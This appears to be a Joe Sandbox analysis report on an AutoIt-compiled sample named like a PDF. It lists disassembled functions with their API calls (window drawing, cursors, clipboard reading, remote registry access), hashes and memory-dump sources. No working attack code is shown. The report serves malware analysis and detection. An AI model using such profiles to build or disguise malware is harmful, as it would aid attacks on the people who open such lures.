                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 4040870279-2373415609
                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                              Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0044181E
                              • SetTextColor.GDI32(?,?), ref: 00441826
                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                              • GetSysColor.USER32(0000000F), ref: 00441849
                              • SetBkColor.GDI32(?,?), ref: 00441864
                              • SelectObject.GDI32(?,?), ref: 00441874
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                              • GetSysColor.USER32(00000010), ref: 004418B2
                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                              • DeleteObject.GDI32(?), ref: 004418D5
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                              • FillRect.USER32(?,?,?), ref: 00441970
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                              • String ID:
                              • API String ID: 69173610-0
                              • Opcode ID: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                              • Opcode Fuzzy Hash: 30a00988875c6ded0cd8785ba6f1a2265e8c4300a859e5cf9301ac7df871b910
                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                              Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(?), ref: 004590F2
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                              • GetStockObject.GDI32(00000011), ref: 004592AC
                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                              • DeleteDC.GDI32(00000000), ref: 004592D6
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                              • GetStockObject.GDI32(00000011), ref: 004593D3
                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                              Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-3360698832
                              • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                              • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                              Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                              Download Yara Rule
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                              • SetCursor.USER32(00000000), ref: 0043075B
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                              • SetCursor.USER32(00000000), ref: 00430773
                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                              • SetCursor.USER32(00000000), ref: 0043078B
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                              • SetCursor.USER32(00000000), ref: 004307A3
                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                              • SetCursor.USER32(00000000), ref: 004307BB
                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                              • SetCursor.USER32(00000000), ref: 004307D3
                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                              • SetCursor.USER32(00000000), ref: 004307EB
                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                              • SetCursor.USER32(00000000), ref: 00430803
                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                              • SetCursor.USER32(00000000), ref: 0043081B
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                              • SetCursor.USER32(00000000), ref: 00430833
                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                              • SetCursor.USER32(00000000), ref: 0043084B
                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                              • SetCursor.USER32(00000000), ref: 00430863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                              • SetCursor.USER32(00000000), ref: 0043087B
                              • SetCursor.USER32(00000000), ref: 00430887
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                              • SetCursor.USER32(00000000), ref: 0043089F
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Cursor$Load
                              • String ID:
                              • API String ID: 1675784387-0
                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                              Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetSysColor.USER32(0000000E), ref: 00430913
                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • GetSysColor.USER32(00000012), ref: 00430933
                              • SetTextColor.GDI32(?,?), ref: 0043093B
                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • GetSysColor.USER32(0000000F), ref: 00430959
                              • CreateSolidBrush.GDI32(?), ref: 00430962
                              • GetSysColor.USER32(00000011), ref: 00430979
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                              • SetBkColor.GDI32(?,?), ref: 004309A6
                              • SelectObject.GDI32(?,?), ref: 004309B4
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                              • GetSysColor.USER32(00000011), ref: 00430A9F
                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                              • SelectObject.GDI32(?,?), ref: 00430AD0
                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                              • SelectObject.GDI32(?,?), ref: 00430AE3
                              • DeleteObject.GDI32(?), ref: 00430AE9
                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1582027408-0
                              • Opcode ID: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                              • Opcode Fuzzy Hash: 877059e5a08506da746904818a271139ce0e07035d8828382933a9fbb09d498c
                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                              Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseConnectCreateRegistry
                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                              • API String ID: 3217815495-966354055
                              • Opcode ID: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                              • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                              • Opcode Fuzzy Hash: 151c93021cbb490f975a6b7c26e52759c625c8b8a8aebcd11daaf619054c364b
                              • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                              Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 004566AE
                              • GetDesktopWindow.USER32 ref: 004566C3
                              • GetWindowRect.USER32(00000000), ref: 004566CA
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                              • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                              • DestroyWindow.USER32(?), ref: 00456746
                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                              • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                              • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                              • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                              • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                              • IsWindowVisible.USER32(?), ref: 0045682C
                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                              • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                              • GetWindowRect.USER32(?,?), ref: 00456873
                              • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                              • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                              • CopyRect.USER32(?,?), ref: 004568BE
                              • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                              • String ID: ($,$tooltips_class32
                              • API String ID: 225202481-3320066284
                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                              Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                              Download Yara Rule
                              APIs
                              • OpenClipboard.USER32(?), ref: 0046DCE7
                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                              • CloseClipboard.USER32 ref: 0046DD0D
                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                              • CloseClipboard.USER32 ref: 0046DD41
                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                              • CloseClipboard.USER32 ref: 0046DD99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                              • String ID:
                              • API String ID: 15083398-0
                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                              Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                              • GetClientRect.USER32(?,?), ref: 00471D05
                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                              • GetClientRect.USER32(?,?), ref: 00471E8A
                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                              • String ID: @$AutoIt v3 GUI
                              • API String ID: 867697134-3359773793
                              • Opcode ID: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                              • Opcode Fuzzy Hash: a77764dc97b758b9f138980a30eafcd252b45b083a0cf55b9ff7e92d3de70106
                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                              Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                              • API String ID: 1503153545-1459072770
                              • Opcode ID: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                              • Opcode Fuzzy Hash: f2d6726f73004f3d285f80ba49d5ebad33d8f67e86e3dcf49ca09fff6bccecde
                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                              Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
